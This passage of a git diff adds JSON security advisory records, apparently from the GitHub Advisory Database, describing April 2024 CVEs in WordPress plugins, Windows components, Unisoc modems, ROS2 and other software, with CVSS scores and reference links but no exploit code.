a/advisories/unreviewed/2024/04/GHSA-g6jj-43rf-3wc6/GHSA-g6jj-43rf-3wc6.json b/advisories/unreviewed/2024/04/GHSA-g6jj-43rf-3wc6/GHSA-g6jj-43rf-3wc6.json new file mode 100644 index 00000000000..d644ec3afbc --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g6jj-43rf-3wc6/GHSA-g6jj-43rf-3wc6.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g6jj-43rf-3wc6", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2023-50347" + ], + "details": "HCL DRYiCE MyXalytics is impacted by an insecure SQL interface vulnerability, potentially giving an attacker the ability to execute custom SQL queries. A malicious user can run arbitrary SQL commands including changing system configuration.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50347" + }, + { + "type": "WEB", + "url": "https://support.hcltechsw.com/csm?id=kb_article&sysparm_article=KB0112318" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g726-jqm5-9q9f/GHSA-g726-jqm5-9q9f.json b/advisories/unreviewed/2024/04/GHSA-g726-jqm5-9q9f/GHSA-g726-jqm5-9q9f.json new file mode 100644 index 00000000000..0f905dbbe07 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g726-jqm5-9q9f/GHSA-g726-jqm5-9q9f.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g726-jqm5-9q9f", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52343" + ], + "details": "In SecurityCommand message after as security has been actived., there is a possible improper input validation. This could lead to remote information disclosure no additional execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52343" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g734-xxmw-4f5p/GHSA-g734-xxmw-4f5p.json b/advisories/unreviewed/2024/04/GHSA-g734-xxmw-4f5p/GHSA-g734-xxmw-4f5p.json new file mode 100644 index 00000000000..ef8b21d9d32 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g734-xxmw-4f5p/GHSA-g734-xxmw-4f5p.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g734-xxmw-4f5p", + "modified": "2024-04-08T12:30:31Z", + "published": "2024-04-08T09:31:13Z", + "aliases": [ + "CVE-2024-23189" + ], + "details": "Embedded content references at tasks could be used to temporarily execute script code in the context of the users browser session. To exploit this an attacker would require temporary access to the users account, access to another account within the same context or an successful social engineering attack to make users import external content. Attackers could perform malicious API requests or extract information from the users account. Please deploy the provided updates and patch releases. Sanitization of user-generated content has been improved. No publicly available exploits are known.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23189" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/releases/8.21" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/releases/8.22" + }, + { + "type": "WEB", + "url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2024/oxas-adv-2024-0001.json" + }, + { + "type": "WEB", + "url": "https://software.open-xchange.com/products/appsuite/doc/Release_Notes_for_Patch_Release_6268_7.10.6_2024-02-08.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T09:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g77x-hh5w-qpw7/GHSA-g77x-hh5w-qpw7.json b/advisories/unreviewed/2024/04/GHSA-g77x-hh5w-qpw7/GHSA-g77x-hh5w-qpw7.json new file mode 100644 index 00000000000..7c3566d1690 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g77x-hh5w-qpw7/GHSA-g77x-hh5w-qpw7.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g77x-hh5w-qpw7", + "modified": "2024-04-08T03:30:52Z", + "published": "2024-04-08T03:30:52Z", + "aliases": [ + "CVE-2023-52345" + ], + "details": "In modem driver, there is a possible system crash due to improper input validation. This could lead to local information disclosure with System execution privileges needed", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52345" + }, + { + "type": "WEB", + "url": "https://www.unisoc.com/en_us/secy/announcementDetail/1777143682512781313" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T03:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g7vh-v2c6-r3fm/GHSA-g7vh-v2c6-r3fm.json b/advisories/unreviewed/2024/04/GHSA-g7vh-v2c6-r3fm/GHSA-g7vh-v2c6-r3fm.json new file mode 100644 index 00000000000..99e7cb61c9f --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g7vh-v2c6-r3fm/GHSA-g7vh-v2c6-r3fm.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g7vh-v2c6-r3fm", + "modified": "2024-04-09T21:31:58Z", + "published": "2024-04-09T21:31:58Z", + "aliases": [ + "CVE-2024-1812" + ], + "details": "The Everest Forms plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 2.0.7 via the 'font_url' parameter. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1812" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3049743/everest-forms" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d4561441-d147-4c02-a837-c1656e17627d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g96r-m5m9-8hqg/GHSA-g96r-m5m9-8hqg.json b/advisories/unreviewed/2024/04/GHSA-g96r-m5m9-8hqg/GHSA-g96r-m5m9-8hqg.json new file mode 100644 index 00000000000..4c2cb1ebaac --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g96r-m5m9-8hqg/GHSA-g96r-m5m9-8hqg.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g96r-m5m9-8hqg", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26226" + ], + "details": "Windows Distributed File System (DFS) Information Disclosure Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26226" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26226" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-g9wx-gpxj-x55q/GHSA-g9wx-gpxj-x55q.json b/advisories/unreviewed/2024/04/GHSA-g9wx-gpxj-x55q/GHSA-g9wx-gpxj-x55q.json new file mode 100644 index 00000000000..6f74b1e8793 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-g9wx-gpxj-x55q/GHSA-g9wx-gpxj-x55q.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g9wx-gpxj-x55q", + "modified": "2024-04-08T00:30:46Z", + "published": "2024-04-08T00:30:46Z", + "aliases": [ + "CVE-2024-3436" + ], + "details": "A vulnerability was found in SourceCodester Prison Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /Admin/edit-photo.php of the component Avatar Handler. The manipulation of the argument avatar leads to unrestricted upload. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-259630 is the identifier assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3436" + }, + { + "type": "WEB", + "url": "https://github.com/fubxx/CVE/blob/main/PrisonManagementSystemRCE.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259630" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259630" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.311919" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T00:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gc37-9w9h-6m6g/GHSA-gc37-9w9h-6m6g.json b/advisories/unreviewed/2024/04/GHSA-gc37-9w9h-6m6g/GHSA-gc37-9w9h-6m6g.json new file mode 100644 index 00000000000..fa130031813 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gc37-9w9h-6m6g/GHSA-gc37-9w9h-6m6g.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gc37-9w9h-6m6g", + "modified": "2024-04-09T21:31:59Z", + "published": "2024-04-09T21:31:59Z", + "aliases": [ + "CVE-2024-2334" + ], + "details": "The Template Kit – Import plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the template upload functionality in all versions up to, and including, 1.0.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2334" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/template-kit-import/trunk/vendor/template-kit-import/inc/class-importer.php#L61" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3058805" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6203a15d-f90f-4147-8e43-afc424bbb750?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gcc4-7369-8cwv/GHSA-gcc4-7369-8cwv.json b/advisories/unreviewed/2024/04/GHSA-gcc4-7369-8cwv/GHSA-gcc4-7369-8cwv.json new file mode 100644 index 00000000000..0c2d5766f28 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gcc4-7369-8cwv/GHSA-gcc4-7369-8cwv.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcc4-7369-8cwv", + "modified": "2024-04-08T15:30:34Z", + "published": "2024-04-08T15:30:34Z", + "aliases": [ + "CVE-2024-3444" + ], + "details": "A vulnerability was found in Wangshen SecGate 3600 up to 20240408. It has been classified as critical. This affects an unknown part of the file /?g=net_pro_keyword_import_save. The manipulation of the argument reqfile leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-259701 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3444" + }, + { + "type": "WEB", + "url": "https://github.com/h0e4a0r1t/lLGcmVjGkR/blob/main/Wangshen%20SecGata%203600%20Firewall%20net_pro_keyword_import_save%20arbitrary%20file%20upload%20vulnerability.pdf" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.259701" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.259701" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.312293" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gchv-5rxx-7j87/GHSA-gchv-5rxx-7j87.json b/advisories/unreviewed/2024/04/GHSA-gchv-5rxx-7j87/GHSA-gchv-5rxx-7j87.json new file mode 100644 index 00000000000..9eaa1246416 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gchv-5rxx-7j87/GHSA-gchv-5rxx-7j87.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gchv-5rxx-7j87", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-29052" + ], + "details": "Windows Storage Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29052" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29052" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gcvf-qqcq-825h/GHSA-gcvf-qqcq-825h.json b/advisories/unreviewed/2024/04/GHSA-gcvf-qqcq-825h/GHSA-gcvf-qqcq-825h.json new file mode 100644 index 00000000000..279d64b624c --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gcvf-qqcq-825h/GHSA-gcvf-qqcq-825h.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcvf-qqcq-825h", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-27632" + ], + "details": "An issue in GNU Savane v.3.12 and before allows a remote attacker to escalate privileges via the form_id in the form_header() function.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-27632" + }, + { + "type": "WEB", + "url": "https://medium.com/%40allypetitt/how-i-found-3-cves-in-2-days-8a135eb924d3" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T22:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gcxm-gg23-j9vq/GHSA-gcxm-gg23-j9vq.json b/advisories/unreviewed/2024/04/GHSA-gcxm-gg23-j9vq/GHSA-gcxm-gg23-j9vq.json new file mode 100644 index 00000000000..09e4ba3c1a4 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gcxm-gg23-j9vq/GHSA-gcxm-gg23-j9vq.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcxm-gg23-j9vq", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28942" + ], + "details": "Microsoft OLE DB Driver for SQL Server Remote Code Execution Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28942" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28942" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gf6m-w8fj-44h4/GHSA-gf6m-w8fj-44h4.json b/advisories/unreviewed/2024/04/GHSA-gf6m-w8fj-44h4/GHSA-gf6m-w8fj-44h4.json new file mode 100644 index 00000000000..8c0d84e3e38 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gf6m-w8fj-44h4/GHSA-gf6m-w8fj-44h4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gf6m-w8fj-44h4", + "modified": "2024-04-09T18:30:27Z", + "published": "2024-04-09T18:30:27Z", + "aliases": [ + "CVE-2024-28921" + ], + "details": "Secure Boot Security Feature Bypass Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28921" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-28921" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-693" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gfgm-4g66-q77w/GHSA-gfgm-4g66-q77w.json b/advisories/unreviewed/2024/04/GHSA-gfgm-4g66-q77w/GHSA-gfgm-4g66-q77w.json new file mode 100644 index 00000000000..8e88a235333 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gfgm-4g66-q77w/GHSA-gfgm-4g66-q77w.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gfgm-4g66-q77w", + "modified": "2024-04-10T15:30:39Z", + "published": "2024-04-10T15:30:39Z", + "aliases": [ + "CVE-2024-3235" + ], + "details": "The Essential Grid Gallery WordPress Plugin plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.1.1 via the on_front_ajax_action() function. This makes it possible for unauthenticated attackers to view private and password protected posts that may have private or sensitive information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-3235" + }, + { + "type": "WEB", + "url": "https://codecanyon.net/item/essential-grid-wordpress-plugin/7563340" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/adadac1e-3d92-41a5-90d4-b2028c8c40c0?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T05:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gg76-g2w9-wqqw/GHSA-gg76-g2w9-wqqw.json b/advisories/unreviewed/2024/04/GHSA-gg76-g2w9-wqqw/GHSA-gg76-g2w9-wqqw.json new file mode 100644 index 00000000000..386c4b62c78 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gg76-g2w9-wqqw/GHSA-gg76-g2w9-wqqw.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gg76-g2w9-wqqw", + "modified": "2024-04-10T15:30:38Z", + "published": "2024-04-10T15:30:38Z", + "aliases": [ + "CVE-2024-30715" + ], + "details": "A buffer overflow vulnerability has been discovered in the C++ components of ROS2 Dashing Diademata in ROS_VERSION 2 and ROS_PYTHON_VERSION 3, allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via improper handling of arrays or strings.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30715" + }, + { + "type": "WEB", + "url": "https://github.com/yashpatelphd/CVE-2024-30715" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-10T02:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gg92-hmqr-8q27/GHSA-gg92-hmqr-8q27.json b/advisories/unreviewed/2024/04/GHSA-gg92-hmqr-8q27/GHSA-gg92-hmqr-8q27.json new file mode 100644 index 00000000000..06a16c28a14 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gg92-hmqr-8q27/GHSA-gg92-hmqr-8q27.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gg92-hmqr-8q27", + "modified": "2024-04-09T21:31:56Z", + "published": "2024-04-09T21:31:56Z", + "aliases": [ + "CVE-2024-0598" + ], + "details": "The Gutenberg Blocks by Kadence Blocks – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the contact form message settings in all versions up to and including 3.2.17 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This primarily affects multi-site installations and installations where unfiltered_html has been disabled.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0598" + }, + { + "type": "WEB", + "url": "https://advisory.abay.sh/cve-2024-0598" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3023068%40kadence-blocks&new=3023068%40kadence-blocks&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/989bd778-c7b2-41c5-ac4a-2f1a4e594f0d?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T19:15:14Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-ghhm-r8cf-62x2/GHSA-ghhm-r8cf-62x2.json b/advisories/unreviewed/2024/04/GHSA-ghhm-r8cf-62x2/GHSA-ghhm-r8cf-62x2.json new file mode 100644 index 00000000000..b5750d67d87 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-ghhm-r8cf-62x2/GHSA-ghhm-r8cf-62x2.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ghhm-r8cf-62x2", + "modified": "2024-04-09T18:30:25Z", + "published": "2024-04-09T18:30:25Z", + "aliases": [ + "CVE-2024-26218" + ], + "details": "Windows Kernel Elevation of Privilege Vulnerability", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-26218" + }, + { + "type": "WEB", + "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-26218" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-367" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-09T17:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gj98-p2xm-q3hc/GHSA-gj98-p2xm-q3hc.json b/advisories/unreviewed/2024/04/GHSA-gj98-p2xm-q3hc/GHSA-gj98-p2xm-q3hc.json new file mode 100644 index 00000000000..f4f5b38a794 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gj98-p2xm-q3hc/GHSA-gj98-p2xm-q3hc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gj98-p2xm-q3hc", + "modified": "2024-04-05T21:32:45Z", + "published": "2024-04-05T21:32:45Z", + "aliases": [ + "CVE-2023-25493" + ], + "details": "\nA potential vulnerability was reported in the BIOS update tool driver for some Desktop, Smart Edge, Smart Office, and ThinkStation products that could allow a local user with elevated privileges to execute arbitrary code. \n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-25493" + }, + { + "type": "WEB", + "url": "https://support.lenovo.com/us/en/product_security/LEN-141775" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-05T21:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gjhv-xhv4-pm88/GHSA-gjhv-xhv4-pm88.json b/advisories/unreviewed/2024/04/GHSA-gjhv-xhv4-pm88/GHSA-gjhv-xhv4-pm88.json new file mode 100644 index 00000000000..4679be4ef60 --- /dev/null +++ b/advisories/unreviewed/2024/04/GHSA-gjhv-xhv4-pm88/GHSA-gjhv-xhv4-pm88.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gjhv-xhv4-pm88", + "modified": "2024-04-09T00:30:41Z", + "published": "2024-04-09T00:30:41Z", + "aliases": [ + "CVE-2024-0083" + ], + "details": "NVIDIA ChatRTX for Windows contains a vulnerability in the UI, where an attacker can cause a cross-site scripting error by network by running malicious scripts in users' browsers. A successful exploit of this vulnerability might lead to code execution, denial of service, and information disclosure.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0083" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5532" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-04-08T22:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/04/GHSA-gmc7-25r9-p22h/GHSA-gmc7-25r9-p22h.json b/advisories/unreviewed/2024/04/GHSA-gmc7-25r9-p22h/GHSA-gmc7-25r9-p22h.json index 90c2726b37b..bab88896372 100644 --- a/advisories/unreviewed/2024/04/GHSA-gmc7-25r9-p22h/GHSA-gmc7-25r9-p22h.json +++ b/advisories/unreviewed/2024/04/GHSA-gmc7-25r9-p22h/GHSA-gmc7-25r9-p22h.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-gmc7-25r9-p22h", - "modified": "2024-04-02T15:30:37Z", + "modified": "2024-04-09T00:30:40Z", "published": "2024-04-02T15:30:37Z", "aliases": [ "CVE-2024-30620" ], "details": "Tenda AX1803 v1.0.0.1 contains a stack overflow via the serviceName parameter in the function fromAdvSetMacMtuWan.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -25,9 +28,9 @@ ], "database_specific": { "cwe_ids": [ - + "CWE-787" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-04-02T14:15:08Z" diff --git a/advisories/unreviewed/2024/04/GHSA-gmw5-2r8g-6fwc/GHSA-gmw5-2r8g-6fwc.json b/advisories/unreviewed/2024/04/GHSA-gmw5-2r8g-6fwc/GHSA-gmw5-2r8g-6fwc.json new file mode 100644 index 00000000000..5d993f6a863 --- /dev/null +++ 